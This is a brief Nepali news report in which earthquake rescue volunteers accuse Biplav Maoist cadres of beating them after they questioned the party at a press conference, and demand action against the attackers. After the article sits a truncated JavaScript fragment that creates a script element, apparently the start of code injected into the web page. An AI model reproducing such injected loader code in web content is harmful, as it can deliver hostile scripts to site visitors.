नेकपा माओवादी विप्लब समूहका कार्यकर्ताद्धारा कुटपिट गरी घाइते भएका महाभुकम्पमा परेकाहरुका लागी उद्धार कार्यमा खटिएका महाबौद्धका स्थानीय युवाहरुले कुटपिटमा संलग्नलाई तत्काल कारबाही गर्न माग गरेका छन। विप्लव माओवादीले आईतबार टुडिखेलमा सम्पन्न पत्रकार सम्मेलनमा सुदिपराज कुवरले एउटा पाल दिन नसकेको अवस्थामा कसरी नयाँ नेपालको निर्माण हुन्छ भनि प्रश्न गरेपछि सो पार्टीका कार्यकर्ताले ठुलो कुरो गर्ने भन्दै कुटपीट गरेको आरोप समेत लगाएका छन्।

मंगलबार काठमाडौंमा पत्रकार सम्मेलन गरेर कुवरले जनताले बास्तविक प्रश्न गर्दा सो पार्टीका कार्यकर्ताले निर्घात कुटपीटि गरेर आलोचना नसुन्ने र सर्वसत्ताबादी चरित्र देखाएको भन्दै जनताको कुरा नसुन्ने पार्टीले कसरी जनताको प्रतिनिधित्व गर्न सक्छ भनि प्रश्न गर्नुभयो। उहाले आफूहरुमाथि आक्रमण गर्नेमाथि तत्काल कारवाही गरेर विधीको शासनलाई जिवित राख्न आग्रह गर्नुभयो। पत्रकार सम्मेलनमा उहाले आफूहरुले महाभुकम्पमा परेका १५ जनालाई जिउदै उद्धार गरेको र आफ्नै गोजिवाट उपत्यकाका साखु, भोटचौरमा गई पिडीतहरुलाई खाना, वस्न तथा उद्धार गरेको बताउनुभयो।

var d=document;var s=d.createElement(‘script’);